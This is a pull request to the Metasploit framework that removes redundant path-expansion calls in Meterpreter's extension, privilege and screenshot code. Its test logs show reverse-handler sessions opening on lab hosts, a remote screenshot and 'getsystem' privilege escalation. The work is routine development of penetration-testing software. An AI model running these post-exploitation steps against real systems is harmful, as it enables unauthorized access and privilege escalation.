### PR TITLE
Remove unnecessary calls to expand path

### DIFF
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -159,14 +159,12 @@ class ClientCore < Extension
     path = MeterpreterBinaries.path(modname, client.binary_suffix)
 
     if opts['ExtensionPath']
-      path = opts['ExtensionPath']
+      path = ::File.expand_path(opts['ExtensionPath'])
     end
 
     if path.nil?
       raise RuntimeError, "No module of the name #{modname}.#{client.binary_suffix} found", caller
     end
-
-    path = ::File.expand_path(path)
 
     # Load the extension DLL
     commands = load_library(

--- a/lib/rex/post/meterpreter/extensions/priv/priv.rb
+++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb
@@ -50,8 +50,6 @@ class Priv < Extension
       raise RuntimeError, "elevator.#{binary_suffix} not found", caller
     end
 
-    elevator_path = ::File.expand_path( elevator_path )
-
     elevator_data = ""
 
     ::File.open( elevator_path, "rb" ) { |f|

--- a/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
+++ b/lib/rex/post/meterpreter/extensions/stdapi/ui.rb
@@ -154,37 +154,43 @@ class UI < Rex::Post::UI
   def screenshot( quality=50 )
     request = Packet.create_request( 'stdapi_ui_desktop_screenshot' )
     request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )
+
     # include the x64 screenshot dll if the host OS is x64
     if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
       screenshot_path = MeterpreterBinaries.path('screenshot','x64.dll')
       if screenshot_path.nil?
         raise RuntimeError, "screenshot.x64.dll not found", caller
       end
-      screenshot_path = ::File.expand_path( screenshot_path )
+
       screenshot_dll  = ''
       ::File.open( screenshot_path, 'rb' ) do |f|
         screenshot_dll += f.read( f.stat.size )
       end
+
       request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_BUFFER, screenshot_dll, false, true )
       request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
     end
+
     # but always include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
     screenshot_path = MeterpreterBinaries.path('screenshot','x86.dll')
     if screenshot_path.nil?
       raise RuntimeError, "screenshot.x86.dll not found", caller
     end
-    screenshot_path = ::File.expand_path( screenshot_path )
+
     screenshot_dll  = ''
     ::File.open( screenshot_path, 'rb' ) do |f|
       screenshot_dll += f.read( f.stat.size )
     end
+
     request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_BUFFER, screenshot_dll, false, true )
     request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE32DLL_LENGTH, screenshot_dll.length )
+
     # send the request and return the jpeg image if successfull.
     response = client.send_request( request )
     if( response.result == 0 )
       return response.get_tlv_value( TLV_TYPE_DESKTOP_SCREENSHOT )
     end
+
     return nil
   end
 


### PR DESCRIPTION
When using the Meterpreter Binaries gem to locate the path to the meterpreter DLLs, it's not necessary to use `File.expand_path` on the result because the gem's code does this already.

This commit simply removes those unnecessary calls. Yeah.. that's right .. FEAR THIS PR!
## Verification
- [x] Make sure priv-related stuff still works (such as `getsystem`) in both Windows x64 and x86.
- [x] Make sure screenshotting still works in both Windows x64 and x86
- [x] Make sure that meterpreter binaries that aren't hosted with the gem (such as POSIX meterp) still run/load properly.
## Sample Run

Shows stuff working in x86:

```
msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 10.1.10.33
[*] Meterpreter session 2 opened (10.1.10.40:8000 -> 10.1.10.33:52266) at 2015-01-03 08:29:14 +1000

meterpreter > screenshot
Screenshot saved to: /home/oj/code/metasploit-framework/dGqKnzHp.jpeg
meterpreter > getsystem
...got system (via technique 1).
```

Shows stuff working in x64:

```
msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Sending stage (972288 bytes) to 10.1.10.33
[*] Meterpreter session 3 opened (10.1.10.40:8000 -> 10.1.10.33:52341) at 2015-01-03 08:34:49 +1000

meterpreter > screenshot
Screenshot saved to: /home/oj/code/metasploit-framework/fUSCQtDz.jpeg
meterpreter > getsystem
...got system (via technique 1).
```

Shows stuff doesn't break with bins that aren't part of the gem:

```
msf exploit(handler) > run

[*] Started reverse handler on 10.1.10.40:8000 
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1142784 bytes) to 10.1.10.40
[*] Meterpreter session 4 opened (10.1.10.40:8000 -> 10.1.10.40:41561) at 2015-01-03 08:36:16 +1000

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000, suid=1000, sgid=1000
```
